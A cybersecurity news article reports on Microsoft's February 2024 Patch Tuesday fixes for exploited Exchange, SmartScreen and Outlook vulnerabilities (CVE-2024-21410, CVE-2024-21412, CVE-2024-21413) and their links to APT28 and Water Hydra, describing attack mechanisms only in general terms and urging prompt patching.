On Wednesday, Microsoft disclosed that a severe security vulnerability, identified as CVE-2024-21410, within its Exchange Server software has been actively exploited in the wild. This revelation came shortly after the tech giant released fixes during its monthly Patch Tuesday updates.
With a CVSS score of 9.8, the flaw represents a significant risk, enabling privilege escalation through an NTLM credentials leakage vulnerability. According to Microsoft’s advisory, “An attacker could target an NTLM client such as Outlook, leading to leaked credentials that can be relayed against the Exchange server.” This breach allows an attacker to impersonate the victim client and perform operations on the server as though they were the genuine user.
Redmond’s latest assessment has classified the vulnerability as having confirmed exploitation, prompting the activation of Extended Protection for Authentication (EPA) by default in the Exchange Server 2019 Cumulative Update 14 (CU14). Details about the attack vectors employed and the identity of potential threat actors remain unclear. However, previous incidents implicate Russian state-affiliated groups like APT28, known for leveraging flaws in Microsoft Outlook to execute NTLM relay attacks.
In recent months, reports have indicated that APT28 has been involved in directed campaigns since at least April 2022, targeting organizations in sensitive sectors such as foreign affairs, energy, defense, and finance. The adaptation of the NTLM relay technique underscores the group’s persistent and evolving threat capability.
As part of its recent updates, Microsoft addressed two additional Windows vulnerabilities—CVE-2024-21351 and CVE-2024-21412—both of which pose significant risks and have been exploited in real-world scenarios. CVE-2024-21412, for instance, allows attackers to bypass Windows SmartScreen protections, a tactic attributed to an advanced persistent threat known as Water Hydra (or DarkCasino). This group has historically utilized zero-day vulnerabilities to deploy malware.
The attack mechanism involves using internet shortcuts disguised as JPEG images. Once a user selects these, the group can exploit CVE-2024-21412, allowing them to bypass Microsoft Defender SmartScreen and compromise the Windows host.
Furthermore, Microsoft’s Patch Tuesday update tackled CVE-2024-21413—another critical Outlook vulnerability that could lead to remote code execution by circumventing essential security measures like Protected View. This issue, dubbed MonikerLink by Check Point, originates from improper parsing of “file://” hyperlinks, allowing malicious actors to execute arbitrary code using crafted URLs, thereby exposing local NTLM credential information and enabling further exploits across other Office applications.
The ongoing developments around these vulnerabilities highlight the urgent need for organizations to apply recommended patches and updates promptly, fostering a proactive approach to safeguarding against evolving cyber threats. Business owners and cybersecurity professionals should closely monitor these incidents, utilizing frameworks like the MITRE ATT&CK for identifying potential tactics and techniques such as initial access, privilege escalation, and remote execution associated with these types of attacks.
